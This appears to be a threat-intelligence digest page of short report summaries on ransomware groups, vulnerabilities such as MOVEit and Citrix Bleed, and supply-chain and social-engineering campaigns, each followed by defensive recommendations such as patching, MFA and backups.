Ivan Righi

TrickBot changes game with Ukrainian infrastructure attacks

This week’s spotlight focuses on the TrickBot threat group, which has shifted from financially motivated cybercrime to targeting Ukrainian critical infrastructure. Since the start of the Russia-Ukraine war, TrickBot has launched multiple campaigns against government entities and other high-value targets, using malware such as IcedID , AnchorMail , Cobalt Strike , and Meterpreter , as well as new tools like Excel-based downloaders and ISO payloads. These attacks mark a significant departure from TrickBot’s prior focus and may indicate coordination with the pro-Russian Conti ransomware group.

Why it matters: TrickBot’s actions blur the lines between cybercrime and state-sponsored operations. The attacks on Ukrainian critical infrastructure could lead to data loss, espionage, or disruption of essential services. Even though Conti officially ceased operations in June 2022, TrickBot members may continue targeting Ukraine in the short-term, potentially working with other threat actors or state entities.

Immediate Actions:

• Organizations, especially in conflict zones, should monitor for TrickBot-related malware and unusual network activity
• Implement endpoint detection and response tools to detect malware such as IcedID, Meterpreter, and Cobalt Strike
• Ensure strong email security, particularly against phishing and malicious attachments
• Verify that multi-factor authentication (MFA) is enforced and educate users on the risks of credential theft
• Maintain robust backups and incident response plans in case of destructive malware deployment

Read Full Report Here

ShinyHunters Targets Salesforce Amid Clues of Scattered Spider Collaboration

After a year of inactivity, ShinyHunters has resurfaced with targeted Salesforce attacks, showing strong tactical overlap with Scattered Spider . Campaigns leverage vishing, Okta-themed phishing pages, malicious Salesforce “connected apps,” and impersonation domains (e.g., ticket-, sso-, helpdesk-themed). Domain patterns suggest financial services and technology providers are likely next targets, with U.S.-based organizations heavily impacted.

Why it matters: Attribution is secondary — these actors are sharing tools and infrastructure. The risk lies in the tactics. These campaigns demonstrate coordinated, high-sophistication social engineering that exploits SaaS platforms and human trust rather than technical vulnerabilities alone.

Immediate Actions:

• Harden help-desk verification processes and run vishing simulations
• Restrict Salesforce API and connected app permissions
• Monitor newly registered impersonation domains
• Automate session termination, password resets, and account disablement after suspicious MFA activity

Focus defenses on detecting and disrupting phishing, credential harvesting, and SaaS abuse rather than tracking group names.

Read Full Report Here

ReliaQuest Annual Cyber-Threat Report: 2024

The 2024 Annual Cyber-Threat Report highlights a rapidly evolving cyber threat landscape, with phishing, AI-driven attacks, and automation dominating observed activity in 2023. Spearphishing links and attachments accounted for over 70% of attacks, while QR code phishing and BEC scams surged sharply. Threat actors increasingly leverage AI tools like FraudGPT to create malware, launch DDoS attacks, and streamline credential theft. Billions of compromised credentials and the growth of Living off the Land techniques emphasize the ongoing risk to organizations across sectors worldwide.

Why it matters: Attack sophistication and speed are increasing, shrinking the window for detection and response, and exposing organizations to financial loss, operational disruption, and reputational damage.

Immediate Actions:

• Train employees on phishing, quishing, and social engineering awareness
• Implement phishing-resistant MFA and strong password policies
• Monitor AI-based attack activity and suspicious automation behavior
• Regularly audit systems for exposed credentials and unusual access patterns
• Leverage AI and automation in defenses to reduce MTTR

Read Full Report Here

Q2 2023 Ransomware Report: Victim Count Hits New Heights

The second quarter of 2023 saw record-breaking ransomware activity, with nearly 1,400 organizations named on data-leak sites—a 66% increase from Q1. The most impactful campaign was by the Clop ransomware group, exploiting a zero-day in MOVEit software to steal data from hundreds of companies. Other notable incidents included the Malas ransomware targeting Zimbra servers. The U.S., U.K., Germany, Canada, and France remained the most targeted countries, while professional services, manufacturing, and finance sectors were hit hardest.

Why it matters: The surge in double-extortion campaigns and extortion-only attacks highlights the growing efficiency and impact of ransomware groups, underscoring the need for proactive defenses and visibility into sensitive data.

Immediate Actions:

• Monitor software for vulnerabilities and apply patches promptly
• Conduct post-compromise assessments if systems may be affected
• Track ransomware-related news and threat intelligence updates
• Educate employees on phishing and social engineering risks
• Review data-exfiltration and file-transfer controls

Read Full Report Here

Ransomware trend thrives as 3,800 ESXi machines attacked

The new ransomware group ESXiArgs rapidly encrypted over 3,800 Linux VMware ESXi servers worldwide in just two days, demanding roughly $50,000 per victim. Exploiting a two-year-old remote code execution vulnerability (CVE-2021-21974), attackers targeted unpatched systems in Europe, North America, and Asia. ESXi servers, which host critical virtual machines and centralized data, make high-value targets for ransomware operators. This surge highlights the ongoing risk of unpatched infrastructure and the shift of ransomware focus toward Linux-based enterprise systems.

Why it matters: Organizations face potential operational shutdowns, significant financial loss, and exposure of sensitive data if ESXi servers are compromised. The threat underscores the importance of timely patching and robust virtualization security.

Immediate Actions:

• Update all VMware ESXi systems to the latest patched versions
• Disable the Service Location Protocol (SLP) service to reduce attack surface
• Restrict ESXi hypervisor access from the public Internet
• Implement Endpoint Detection and Response (EDR) on ESXi hosts
• Use recovery scripts cautiously and verify backups are secure

Read Full Report Here

Extortion evolution: ALPHV leaks data on cloned website

The ransomware group ALPHV (aka Blackcat) has advanced its extortion tactics by cloning victims’ websites to publish stolen data, often using typo-squatted domains that closely mimic the legitimate URLs. This approach exposes sensitive information on the clear web, improving accessibility and download speeds while increasing the likelihood of victims’ partners, clients, and customers encountering the data. Recent activity targeted a U.S. financial services firm, leaking passports, driver’s licenses, and tax records, showing that ALPHV continues to innovate and pressure victims more effectively than many short-lived ransomware groups.

Why it matters: Cloned websites make sensitive data highly visible and easily shared, amplifying reputational damage and incentivizing ransom payments. Organizations face higher exposure risk without monitoring for domain impersonation and unusual data-leak activity.

Immediate Actions:

• Monitor for typo-squatted or impersonated domains resembling your brand
• Verify and secure all public-facing websites against unauthorized replication
• Maintain offline, secure backups of sensitive data
• Educate employees and clients to recognize suspicious URLs and phishing attempts
• Apply standard ransomware defenses, including network segmentation and access controls

Read Full Report Here

Sandworm adopts ransomware with murky motives

Russia’s Sandworm APT group has been linked to a new wave of ransomware attacks using RansomBoggs , targeting Ukrainian organizations. The malware, written in .NET and delivered via PowerShell scripts, encrypts files using AES-256 with RSA-encrypted keys. While the ransom note promises decryption, the attacks are likely politically motivated, aimed at disrupting critical infrastructure, with potential financial gain as a secondary objective. Sandworm’s extensive history of sophisticated attacks, including NotPetya and CaddyWiper, highlights its ability to combine destructive malware with strategic targeting.

Why it matters: Sandworm’s use of ransomware blurs the line between politically and financially motivated attacks. Organizations supporting Ukraine or operating critical infrastructure in Europe may be at heightened risk, as attacks could escalate from encryption-only campaigns to full data exfiltration or double extortion.

Immediate Actions:

• Patch Oracle Access Manager and other known exploited software, including CVE-2021-35587
• Restrict PowerShell execution to administrators and monitor for suspicious scripts
• Ensure endpoint detection and antivirus tools cover ransomware and RATs like njRat
• Back up critical data offline and regularly test restoration procedures
• Educate staff on phishing, malware delivery techniques, and recognizing unusual system activity

Read Full Report Here

Ransom Cartel and REvil: Partners in cybercrime?

Security researchers have identified links between the Ransom Cartel ransomware group and the infamous REvil gang. Ransom Cartel appears to have used REvil’s original source code to build its own variant, showing overlaps in ransomware behavior, ransom notes, and configuration files. Although the groups may now operate independently, Ransom Cartel is evolving, potentially preparing its own data-leak site to enhance extortion activities.

Why it matters: Ransom Cartel conducts double-extortion attacks, targeting organizations in education, manufacturing, utilities, and energy sectors. Initial access often comes from compromised credentials, purchased access from brokers, or exploiting Windows and Linux ESXi servers. While the group currently has a smaller footprint than REvil or LockBit, it remains motivated and capable of high-impact ransomware operations.

Immediate Actions:

• Ensure all credentials, especially for VPNs, RDP, and SSH, are secure and regularly rotated
• Patch and update critical systems, including Microsoft Windows, Linux ESXi, and other enterprise platforms
• Implement endpoint detection and response tools to detect RATs, malware, and ransomware behaviors
• Educate staff on phishing, credential theft, and safe handling of downloaded files
• Back up critical data offline and regularly test recovery procedures

Read Full Report Here

LastPass suffers source code data breach

This week’s spotlight focuses on a cyber attack against LastPass , one of the world’s largest password management services. On 25 Aug 2022, threat actors accessed portions of LastPass’ source code and proprietary technical data via a compromised developer account. According to LastPass, no customer data or encrypted vaults were accessed, but the breach of source code could still expose potential vulnerabilities that might be exploited in the future.

Why it matters: LastPass is used by over 33 million individual users and 100,000 businesses, storing sensitive passwords. A source code leak can allow attackers to identify weaknesses and craft targeted attacks. Even without direct access to passwords, attackers could leverage user information for phishing or social-engineering campaigns.

Immediate Actions:

• Change master passwords and any high-value credentials stored in LastPass
• Ensure passwords are long (16+ characters), complex, and unique for each account
• Implement two-factor authentication (2FA) wherever possible
• Monitor for phishing attempts or suspicious messages, especially targeting users of LastPass
• Security teams should assess which stored credentials are most sensitive and create contingency plans for potential leaks

Read Full Report Here

Common Malware Loaders

Malware loaders accounted for nearly 40% of critical security incidents in 2024, serving as the primary entry point for ransomware, RATs, and data theft campaigns. Leading families such as SocGholish, GootLoader, and Raspberry Robin increasingly use fileless techniques, Python-based persistence, SEO poisoning, and legitimate tools to evade detection in Windows environments. Despite major law enforcement disruptions like Operation Endgame, threat actors have rapidly shifted to new loaders and subscription-based “loader-as-a-service” models. Finance, healthcare, government, and manufacturing sectors remain heavily targeted across North America and Europe.

Why it matters: Loaders are the gateway to full-scale breaches — once established, they enable lateral movement, privilege escalation, ransomware deployment, and prolonged undetected access.

Immediate Actions:

• Restrict and closely monitor PowerShell, wscript.exe, and Python execution
• Block script execution from temporary and untrusted directories
• Alert on unusual scheduled task creation, especially recurring tasks
• Monitor DNS and outbound traffic for anomalous C2 patterns
• Deploy EDR detections for in-memory execution and process injection

Read Full Report Here

CrowdStrike Outage: Script, Phishing, and Social Engineering Attacks

On July 19, 2024, a faulty update to CrowdStrike ’s Falcon Sensor triggered widespread Windows BSOD outages globally. While the issue was not caused by a cyberattack, threat actors quickly exploited the disruption with fake remediation scripts, phishing domains, and social engineering campaigns. Malicious PowerShell and batch scripts—often hosted on platforms like GitHub—were used to deploy tools such as Remcos RAT and other malware. Attackers also distributed weaponized Word documents with macros and registered dozens of impersonation domains claiming to offer outage fixes.

Why it matters: Operational outages create high-risk conditions where urgency overrides caution, increasing the likelihood of credential theft, malware infection, and unauthorized remote access.

Immediate Actions:

• Follow only official vendor remediation guidance
• Block or restrict execution of unsigned PowerShell and batch scripts
• Disable Office macros from untrusted sources
• Monitor for newly registered impersonation domains
• Reinforce phishing and vishing awareness with users

Read Full Report Here

New 2024 MOVEit Transfer Vulnerability: What We Know So Far

On June 25, 2024, a high-severity vulnerability (CVE-2024-5806) was disclosed in Progress Software ’s MOVEit Transfer, affecting its SFTP module. The flaw allows authentication bypass, enabling attackers to impersonate users and access, modify, or delete sensitive files. Proof-of-concept code is public, and exploitation has already been observed in the wild. Given MOVEit’s widespread use in financial services and other data-sensitive sectors, the risk of targeted data theft and extortion is elevated.

Why it matters: Authentication bypass in managed file transfer software creates a direct path to large-scale data exfiltration, regulatory exposure, and potential ransomware or extortion campaigns.

Immediate Actions:

• Immediately patch MOVEit to the latest fixed version
• Backup systems before remediation changes
• Restrict outbound traffic from MOVEit servers to trusted destinations
• Block public inbound RDP access to MOVEit infrastructure
• Audit user accounts and monitor for suspicious file access or authentication activity

Read Full Report Here

New Execution Technique in ClearFake Campaign

We identified a new ClearFake campaign using social engineering to trick users into manually executing malicious PowerShell code. Once executed, the code clears DNS caches, displays fake prompts, downloads additional scripts, and installs the LummaC2 malware. Unlike traditional drive-by downloads, this method relies on user action, allowing attackers to bypass detection tools and evade security controls. Financial, business, and general enterprise users are at heightened risk, as compromised websites guide them through the infection process.

Why it matters: Successful execution allows malware to bypass technical defenses, potentially leading to data theft, persistence, and unauthorized access in enterprise environments.

Immediate Actions:

• Restrict PowerShell execution to only necessary users
• Educate employees on the risks of copying and pasting code from untrusted sources
• Block known malicious domains and IP addresses
• Implement network and endpoint controls to detect suspicious script execution
• Keep websites and third-party tools patched to prevent code injection

Read Full Report Here

Living off the Land and Fileless Malware

We report that fileless malware and Living off the Land (LotL) techniques remain dominant threats, accounting for 86% of critical incidents in 2023. Attackers exploit legitimate Windows binaries like rundll32, msiexec, and mshta to execute malicious code in-memory, blending with normal system activity. These stealthy tactics make detection and post-incident analysis difficult, allowing adversaries—including advanced persistent threat groups—to conduct espionage, data theft, or ransomware deployment without leaving traditional malware footprints.

Why it matters: Fileless and LotL attacks evade signature-based defenses, increasing the risk of prolonged undetected intrusions and operational impact on critical systems.

Immediate Actions:

• Restrict and monitor PowerShell, WScript, and other scripting tools to authorized users only
• Implement application allowlisting and behavioral detection for LOLBins
• Segregate critical systems and audit Windows Registry changes
• Monitor outbound connections for suspicious activity or C2 communication
• Enable logging and transcription of script execution for forensic visibility

Read Full Report Here

New Black Basta Social Engineering Scheme

A new social engineering campaign by the Black Basta ransomware group was discovered, leveraging spam emails and voice phishing (vishing) to gain initial access. Attackers overwhelm users with thousands of emails and then impersonate IT staff, convincing them to install legitimate remote access tools such as Quick Assist (Windows 11) or AnyDesk. Once access is granted, attackers execute scripts to steal credentials, establish persistence via registry Run keys, and connect to their command-and-control servers.

Why it matters: This campaign exploits human trust and widely trusted software, making organizations highly vulnerable to credential theft, lateral movement, and potential ransomware deployment.

Immediate Actions:

• Block newly registered domains at network proxies to prevent malicious downloads
• Restrict RMM software to approved applications only using application allowlisting
• Audit current remote management tools in the environment using tools like GreyMatter Hunt
• Educate users to follow official IT support channels and verify unexpected assistance requests
• Reset credentials immediately if unauthorized remote access is suspected

Read Full Report Here

Ransomware and Cyber Extortion in Q1 2024

Ransomware activity in Q1 2024 saw an 18% decline compared to Q4 2023, largely due to holiday periods and law enforcement operations against groups like ALPHV and LockBit. Despite the slowdown, Black Basta experienced a 41% increase in activity, while other major groups—including LockBit, Play, and ALPHV—remained active but at reduced levels. Notably, ALPHV conducted an exit scam after receiving a $22 million ransom from a healthcare organization, with some affiliates moving to the newly emerged RansomHub group.

Key Trends: Ransomware continues to target US organizations, especially in manufacturing, healthcare, and professional services. Attackers rely on phishing, exposed remote services, and software vulnerabilities to gain initial access. Law enforcement operations, such as Operation Chronos against LockBit, have temporarily disrupted activity and exposed weaknesses within criminal networks. Emerging groups like RansomHub are experimenting with new affiliate payment models, while Clop is expected to return targeting enterprise file transfer software.

Immediate Actions:

• Implement multifactor authentication (MFA) to secure user accounts and reduce credential theft risks.
• Apply the principle of least privilege to limit user access rights and minimize attack surface.
• Maintain strong “joiners, movers, leavers” (JML) processes to ensure accounts are updated or deactivated promptly.
• Use defense-in-depth strategies, layering multiple security controls to stop attacks at different stages.
• Ensure reliable, tested backups to recover data without paying ransoms.
• Monitor external-facing assets for vulnerabilities and patch known exploits quickly.
• Restrict PowerShell usage to authorized personnel to prevent abuse by attackers.
• Prioritize regular patch management for systems, software, and firmware based on risk.

Read Full Report Here

What Is Scattered Spider?

Scattered Spider is a financially motivated cybercriminal group known for advanced social engineering and ransomware attacks against large U.S. organizations. They target telecommunications, technology, healthcare, entertainment, and finance sectors, exploiting help desk staff and new hires to bypass MFA and gain network access. Collaborations with ALPHV and use of BlackCat ransomware enable double-extortion campaigns that exfiltrate and encrypt sensitive data. Their tactics emphasize deception over technical exploits, making them especially effective against English-speaking victims and hybrid work environments.

Why it matters: These campaigns demonstrate high-risk social engineering that can cause major financial losses, operational disruption, and reputational damage if not proactively mitigated.

Immediate Actions:

• Train all employees on phishing and social engineering awareness
• Enforce strong password policies and phishing-resistant MFA
• Audit and restrict remote access tools and unused ports
• Implement network segmentation and EDR monitoring
• Maintain encrypted, isolated backups of critical data

Read Full Report Here

Business Email Compromise Detection

Business Email Compromise (BEC) attacks have surged 246% over the past year, targeting organizations globally through sophisticated phishing and generative AI-assisted campaigns. Attackers exploit compromised employee accounts, administrative access, and session tokens to bypass MFA and conduct fraudulent transactions or unauthorized access. Traditional static detection often fails against these evolving threats, requiring advanced correlation, session analysis, and anomaly detection to identify malicious activity in real time.

Why it matters: BEC can result in significant financial loss, data compromise, and operational disruption, with global damages exceeding billions annually and expected to grow in 2024.

Immediate Actions:

• Secure administrative accounts and separate them from regular email use
• Implement strong MFA, preferably FIDO2 hardware-based, and enforce location-based access policies
• Monitor authentication sequences and session anomalies for suspicious activity
• Verify all financial or sensitive transactions through dual authorization and alternative channels
• Block newly registered domains to prevent phishing and BEC attempts

Read Full Report Here

LockBit Taken Down: What Comes Next?

Law enforcement’s Operation Cronos has significantly disrupted the LockBit ransomware group, targeting servers, cryptocurrency wallets, and accounts globally. While LockBit has reestablished a data-leak site, the seizure of infrastructure, arrests, and recovery of decryption keys marks a major victory against one of the most active ransomware groups. Organizations impacted by recent LockBit activity may now access a free decryption tool, though the group could attempt to restore operations or affiliates may migrate to other ransomware campaigns.

Why it matters: The operation reduces LockBit’s immediate threat, aids victim recovery, and reshapes the ransomware landscape, but ransomware activity will continue as groups adapt and evolve.

Immediate Actions:

• Ensure backups are current and verified for quick recovery
• Deploy and monitor anti-ransomware solutions and EDR tools
• Use threat intelligence to track LockBit activity and affiliate movements
• Educate employees on ransomware phishing and social engineering tactics
• Integrate cybersecurity platforms for proactive threat detection and automated response

Read Full Report Here

Ransomware and Cyber-extortion Trends in Q4 2023

Q4 2023 saw an 80% increase in ransomware attacks compared to Q4 2022, driven by vulnerabilities like Citrix Bleed and the aggressive tactics of groups such as ALPHV, Play, and LockBit. Public-facing application exploits, phishing campaigns, and ransomware-as-a-service (RaaS) platforms enabled attackers to target high-value organizations across the United States, UK, and Canada. These attacks emphasized double-extortion, regulatory pressure, and lateral movement techniques.

Why it matters: The surge in ransomware highlights the evolving threat landscape and the need for organizations to patch vulnerabilities, restrict privileged access, and educate employees on social engineering and phishing risks. Groups like LockBit are actively expanding membership and capabilities, making vigilance essential.

Immediate Actions:

• Ensure operating systems, software, and firmware are up to date
• Practice least privilege access and restrict administrative accounts
• Disable unused internet-facing services and restrict command-line/scripting access
• Secure remote-access tools and enforce application controls
• Conduct ongoing security awareness training and phishing simulations
• Monitor high-value systems for suspicious lateral movements and privilege escalations

Read Full Report Here

ALPHV Ransomware Site Outage: What’s Going On?

In December 2023, ALPHV’s (aka BlackCat) data-leak site experienced intermittent outages, creating confusion among cybercriminals and threat researchers. While the FBI reportedly intervened, the ransomware group reclaimed portions of its site, signaling continued operations despite law enforcement pressure. The outages disrupted some affiliate activities and may have limited new attacks temporarily.

Why it matters: Law enforcement actions, including potential asset recovery and decryption tools, can undermine ransomware groups’ credibility and reduce ransom payments. However, such groups often adapt quickly, with affiliates moving to other programs or launching new operations.

Immediate Actions:

• Monitor for ransomware activity targeting your organization, even if groups appear disrupted
• Maintain offline backups and ensure regular recovery drills
• Educate staff on phishing and social engineering threats
• Keep antivirus, endpoint detection, and response tools up to date
• Patch public-facing systems and review remote-access security
• Track threat intelligence feeds for updates on active ransomware campaigns

Read Full Report Here

Citrix Bleed Vulnerability: Background and Recommendations

In November 2023, the Citrix Bleed vulnerability (CVE-2023-4966) was actively exploited by a LockBit affiliate to gain access to sensitive files via vulnerable Citrix NetScaler Gateway and ADC devices. Attackers exfiltrated data using rclone.exe and deployed a benign “!important_read_me!.txt” file in each directory, initiating contact for ransom negotiations without immediately encrypting files.

Why it matters: Citrix Bleed allows attackers to retrieve session authentication tokens and hijack active user sessions. With thousands of vulnerable devices exposed and multiple threat groups exploiting this flaw, unpatched systems face high risk of compromise.

Immediate Actions:

• Update NetScaler ADC and Gateway to patched versions as recommended by CISA and Cloud Software Group
• Kill all active sessions on affected devices to prevent session hijacking
• Monitor logs (e.g., TCPCONNSTAT under SSLVPN) for anomalous activity such as concurrent sessions from different IPs
• Audit and secure remote-access tools and protocols
• Conduct security awareness training and limit privileged account use
• Apply relevant detection rules for discovery, lateral movement, exfiltration, credential access, and privilege escalation techniques

Read Full Report Here

Ransomware and Cyber-extortion Trends in Q3 2023

In Q3 2023, ransomware activity remained relentless, with groups like Rhysida, Clop, and ALPHV driving high-profile campaigns. Rhysida targeted healthcare and education, disrupting 17 hospitals and 166 clinics, while Clop executed its MOVEit campaign, exfiltrating large volumes of data without deploying ransomware.

Trends: Despite a slight drop in the number of organizations named on data-leak sites compared to Q2, ransomware activity was nearly double that of the previous year. New groups, such as LostTrust, emerged quickly, often re-extorting previously targeted organizations. The US was the most targeted country, with professional services, manufacturing, and construction sectors bearing the brunt of attacks.

Recommended Actions:

• Implement multifactor authentication (MFA) for all accounts, particularly remote and privileged users
• Use canary tokens and continuous monitoring for early threat detection
• Segment networks to limit ransomware propagation
• Maintain offline, immutable backups and secure data recovery procedures
• Regularly patch software and external-facing systems
• Restrict PowerShell use and enforce execution of signed scripts only
• Deploy endpoint detection and response (EDR) solutions and maintain comprehensive logging
• Apply a defense-in-depth strategy combining multiple security controls

Read Full Report Here

The Israel–Hamas Conflict: Implications for the Cyber Threat Landscape

Following the October 7, 2023 Hamas attack on Israel, cyber threat activity is expected to increase, driven by both hacktivists and nation-state actors. Pro-Hamas hacktivist groups, such as Killnet, UserSec, and Anonymous Sudan, have pledged support for attacks against Israeli targets, primarily using distributed denial-of-service (DDoS) methods. Meanwhile, pro-Israel groups like ThreatSec have reportedly targeted Palestinian infrastructure.

Nation-State Risks: Iranian-linked cyber groups may increase targeted operations against Israeli or Western organizations, while Russia- and China-aligned actors could exploit the situation for espionage or influence campaigns. These attacks are expected to be strategic, impacting critical infrastructure, telecommunications, and defense-related businesses.

Recommended Actions:

• Deploy anti-DDoS solutions and follow mitigation best practices to defend against hacktivist attacks
• Perform a comprehensive risk assessment of internet-facing infrastructure, patch vulnerabilities, and reduce the attack surface
• Ensure incident response teams are aware of heightened threats and update callout lists and plans accordingly
• Monitor geopolitical developments, as organizations supporting Israel may be considered secondary targets by adversaries

Read Full Report Here

Multinational Operation Disrupts QakBot Botnet

On August 29, 2023, a multinational operation successfully disrupted the QakBot botnet, which had infected over 700,000 computers worldwide. QakBot, a long-standing banking trojan, enables attackers to gain network access, steal sensitive data, and deliver additional malware including ransomware. Recent associations with the Black Basta ransomware group highlight its persistent threat across multiple industries. The operation involved seizure of cryptocurrency profits and removal of malware from victim systems.

Why it matters: This takedown reduces immediate exposure to QakBot-driven attacks, but its adaptability means organizations remain at risk from similar malware campaigns.

Immediate Actions:

• Verify QakBot uninstaller deployment on all systems
• Educate employees on phishing and social engineering threats
• Restrict remote access software and review permissions
• Monitor for unusual network traffic or unauthorized account access
• Check compromised credentials using public breach notification tools

Read Full Report Here

Brace for Impact: Clop MoveIT Breach Continues

The Clop ransomware group continues to exploit the MOVEit file transfer vulnerability (CVE-2023-34362), targeting organizations globally. Recently, Clop has published torrents of stolen data from eight companies, following a slow, staged release tactic. With over 260 organizations already impacted, this campaign highlights the persistent risk of ransomware leveraging widely used software for data exfiltration.

Why it matters: The new torrent-based leaks make stolen data easier to share and download, increasing exposure and potential reputational and financial damage for affected organizations.

Immediate Actions:

• Verify MOVEit software is fully updated or patched
• Conduct post-compromise analysis if your data may have been exposed
• Monitor for data leaks and suspicious activity linked to your organization
• Educate employees on phishing and social engineering risks
• Evaluate alternative secure file transfer solutions

Read Full Report Here

Clop Leaks: First Wave of Victims Named

The Clop ransomware group continues its MOVEit Transfer exploitation campaign, naming over 250 organizations across the US, Europe, and Asia. Unlike traditional ransomware, Clop focuses on data extortion—stealing sensitive information without encrypting systems—and leaks it if victims fail to negotiate. By targeting vulnerable managed file transfer software, the group efficiently compromises multiple organizations simultaneously, highlighting the persistent risk of supply-chain attacks.

Why it matters: Organizations using MOVEit Transfer are at high risk of data exposure, making timely patching, monitoring, and mitigation critical to avoid reputational and financial damage.

Immediate Actions:

• Identify all MOVEit Transfer instances and apply the latest security patches
• Restrict MFT access to authorized users and known IP addresses
• Monitor for unauthorized data exfiltration or suspicious activity
• Conduct post-compromise assessments if systems may have been exposed
• Educate staff on phishing and extortion tactics used by ransomware groups

Read Full Report Here

MOVEit Vulnerability Update: Clop Claims Responsibility

On June 5, 2023, the Clop ransomware group claimed responsibility for attacks exploiting a critical zero-day vulnerability in MOVEit Transfer (CVE-2023-34362). Clop began exploiting the flaw on May 27, 2023, targeting hundreds of organizations. By June 6, Clop posted on its dark-web data-leak site, demanding victims initiate ransom negotiations by June 14, 2023, or risk having stolen data publicly exposed.

Why it matters: MOVEit Transfer is widely used in enterprise environments, and unpatched instances allow attackers to gain unauthorized access, exfiltrate sensitive data, and conduct large-scale extortion campaigns rapidly.

Immediate Actions:

• Identify all MOVEit Transfer instances and apply patches for CVE-2023-34362
• Assume compromise for publicly accessible versions prior to May 31, 2023
• Review MOVEit logs (C:\Windows\System32\winevt\Logs\MOVEit.evtx) to determine exfiltrated data
• Restrict MFT access to authorized users and known IP addresses
• Conduct tabletop exercises for ransomware/extortion response, involving leadership and operational teams
• Establish or maintain relationships with law enforcement (e.g., FBI) for support if needed
• Evaluate and harden all MFT solutions and other internet-facing services, enabling logging and SIEM integration for detection

Read Full Report Here

MOVEit Transfer Zero-Day: What We Know So Far

On May 31, 2023, a critical zero-day vulnerability (CVE-2023-34362) was discovered in MOVEit Transfer , a widely used enterprise file-transfer solution. Active exploitation of this vulnerability has been observed since at least May 27, 2023, allowing attackers to escalate privileges, access sensitive data, and potentially alter or delete database elements, depending on the backend database (MySQL, MS SQL Server, or Azure SQL).

Affected Versions:

• MOVEit Transfer 2023.0.0
• MOVEit Transfer 2022.1.x
• MOVEit Transfer 2022.0.x
• MOVEit Transfer 2021.1.x
• MOVEit Transfer 2021.0.x

Immediate Actions:

• Backup all MOVEit Transfer systems before patching or mitigation
• Disable HTTP/HTTPS access to the MOVEit environment to prevent unauthorized logins
• Review and remove any unauthorized files and user accounts, and reset credentials
• Apply official patches from Progress Software Corporation for all affected versions
• Monitor for unique indicators of compromise and implement detection rules to identify exploitation
• Engage with threat-hunting or security teams to detect and remediate signs of exploitation

Why it matters: Exploitation of this vulnerability can lead to rapid, large-scale compromise of organizations using MOVEit Transfer. Effective detection, patching, and response are essential to minimize risk, as attackers may continue exploiting this flaw while unpatched instances remain exposed to the internet.

Read Full Report Here

2023 Ransomware: Detection and Prevention

Ransomware attacks surged in Q1 2023, with double-extortion campaigns increasing nearly 30%, affecting organizations globally. Key vulnerabilities, including GoAnywhere (CVE-2023-0669), ESXiArgs (CVE-2021-21974), and IBM Aspera Faspex (CVE-2022-47986), have been actively exploited by threat actors targeting businesses of all sizes, from financial services to media and entertainment. The attacks demonstrate a mix of data exfiltration and encryption tactics, highlighting the sophistication and evolving methods of ransomware operators.

Why it matters: These attacks can result in significant financial losses, operational disruption, and reputational damage, emphasizing the need for proactive cybersecurity measures.

Immediate Actions:

• Patch critical vulnerabilities immediately, including GoAnywhere, ESXi, and IBM Aspera Faspex
• Segment networks and monitor external-facing assets for exposure
• Enforce least-privilege access and secure service accounts
• Enable comprehensive endpoint detection and logging for suspicious activity
• Use automatic updates to maintain current software and security patches

Read Full Report Here

2023 Ransomware Attacks: First-Quarter Highlights

Ransomware activity surged in Q1 2023, with nearly 850 organizations named on data-leak sites—a 22% increase from the previous quarter. Notable incidents include Clop exploiting a GoAnywhere zero-day (CVE-2023-0669) to steal data from over 130 organizations without encrypting files, and LockBit remaining the most active ransomware group. The US remained the most targeted country, while industrial goods, services, and healthcare sectors saw the highest victim counts. FBI disruptions, like the Hive server seizure, highlighted law enforcement efforts but attacks continue at record pace.

Why it matters: The rapid growth in ransomware and data-exfiltration campaigns underscores severe financial, operational, and reputational risks for businesses worldwide.

Immediate Actions:

• Monitor data-leak sites and dark web mentions for your organization
• Patch critical vulnerabilities in file-transfer platforms like GoAnywhere
• Prioritize security for high-risk sectors, including healthcare and industrial services
• Segment networks and enforce least-privilege access for sensitive accounts
• Deploy and maintain comprehensive endpoint detection and logging

Read Full Report Here

3CX Desktop Client Trojanized for Supply-Chain Attacks

On March 29, 2023, a legitimate, signed version of the 3CX Desktop Client was trojanized in a supply-chain attack, attributed to the North Korean Lazarus Group. The malware, dubbed SmoothOperator, can exfiltrate system information and browser-stored credentials via a multi-stage payload. Impacted versions include 3CX Desktop Client on Windows and MacOS, affecting potentially millions of global users. The attack highlights the growing risk of software supply-chain compromises, which can rapidly scale and disrupt operations across industries.

Why it matters: Compromised software from trusted vendors can bypass traditional defenses, exposing organizations to data theft, operational disruption, and targeted attacks, particularly in financial services, government, and technology sectors.

Immediate Actions:

• Uninstall the 3CX Electron Desktop Client from all Windows and Mac systems
• Disable automatic updates for 3CX Desktop Client
• Use the 3CX PWA client until a secure update is available
• Conduct endpoint hunts for indicators of compromise
• Verify suppliers and partners for 3CX usage and assess risk

Read Full Report Here

BreachForums Is Down as FBI Arrests Alleged Founder

On March 15, 2023, the FBI arrested the alleged founder and administrator of BreachForums, a prominent English-language cybercriminal forum. The forum, launched in March 2022 to succeed RaidForums, provided a platform for trading stolen data, account credentials, and cybercrime discussions. Following the arrest, BreachForums went offline, and the new administrator confirmed its permanent takedown, citing potential law enforcement compromise. Users have begun migrating to other underground forums, while new English-speaking platforms are likely to emerge soon.

Why it matters: The closure of BreachForums disrupts a major cybercriminal hub but does not eliminate the threat; data leaks and criminal activity will continue on alternative forums, posing ongoing risks to enterprises.

Immediate Actions:

• Monitor dark web forums and data-leak sources for mentions of your organization
• Track new English-speaking cybercriminal platforms emerging from BreachForums’ closure
• Enhance visibility on Russian-language forums and Telegram channels used for data leaks
• Update threat intelligence feeds and alerting for stolen credentials
• Educate teams on ongoing risks from displaced cybercriminal activity

Read Full Report Here

Russia-Ukraine War: 3 Cyber Threat Effects, 1 Year In

One year into the Russia-Ukraine war, cyber threats have evolved across state-sponsored operations, cybercrime, and hacktivism. Russian APT groups have targeted Ukrainian entities with espionage, wiper malware, and disinformation campaigns, while cybercriminals like LockBit have adapted tactics to avoid disruption and continue ransomware attacks. Hacktivist groups, including KillNet and the IT Army of Ukraine, have also emerged, launching DDoS attacks, website defacements, and data breaches in support of their respective sides. The convergence of these actors highlights a new era of cyber-enhanced conflict with broad implications.

Why it matters: Geopolitically driven cyber activity creates unpredictable risks, threatening business operations, data security, and critical infrastructure even beyond conflict zones.

Immediate Actions:

• Monitor geopolitical developments and associated cyber threats
• Enhance defenses against DDoS, ransomware, and phishing campaigns
• Audit systems for exposure to state-sponsored malware
• Implement proactive threat intelligence and anomaly detection
• Educate staff on emerging hacktivist tactics and social engineering risks

Read Full Report Here

